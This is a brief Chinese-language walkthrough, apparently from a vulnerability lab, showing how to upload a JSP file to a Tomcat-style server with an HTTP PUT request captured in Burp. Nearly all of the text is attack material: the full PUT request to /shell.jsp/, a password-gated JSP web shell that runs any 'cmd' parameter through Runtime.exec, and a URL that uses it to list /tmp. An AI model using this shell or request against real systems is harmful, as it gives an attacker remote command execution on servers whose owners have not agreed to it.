访问目标
http://123.58.236.76:15450/
burp抓包
修改请求方式为PUT,增加POST请求体
PUT /shell.jsp/ HTTP/1.1
Host: 123.58.236.76:15450
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IlUzNGxjL1NvSjdQTzRWMjd1dVNvNHc9PSIsInZhbHVlIjoiNXlRQUpFWTlYek9CTnVkSmk4bzZza05QL3JLNTI4eHJYNHlDaWpsV0lLbjJkYXJpbFJjSXZvUFZYTDQzeTdLZTg1cFc2TmV0OUY0UWVIaXlrZGEwc3dTc3gyaWxtTjJ5eVE1ZVN1TEZ3WFhSbVd1NXVVOE45SUxOQldjM3Z0QTciLCJtYWMiOiI4YzdjMjZmYWM3OGJhNTczZTMxMTUwODY5MGU3YTIzNDRiYjhhYmM5ZDNmNzNjNjFkMjgzMTgzMzVhMDRlMmZjIn0%3D; laravel_session=eyJpdiI6ImFCZS85SDczQXBwL1ZwUFJHUE0veEE9PSIsInZhbHVlIjoic082eUJBSFZrQ2NsOXRxakt6MkVLT0Y5Vk1SbnFDYlJNNkwwSWdpNGhycDN3ejYvaTE4WjBhMThlQnBUTWkwN2RSY3pXZXQwZlNXRTZsVW5OMW0yRmErZGVmeitYYktUbFA1QWhFN1hSMDZGTEJGVURhYlUxczBBbTRKY3hwWUwiLCJtYWMiOiJkYThhN2RmOGRiZjBjZjc1ZTBlNTM4MTQyZmUxOTcyMDllZDM0OTEzZDYxOWY3NzdjNmE1MzcyMTgyYjE0ZmFkIn0%3D; JSESSIONID=3D9771B252C8900C7201D5D0100C59ED
Connection: close
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[1024];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
直接远程命令执行
http://123.58.236.76:15450/shell.jsp?pwd=123&cmd=ls /tmp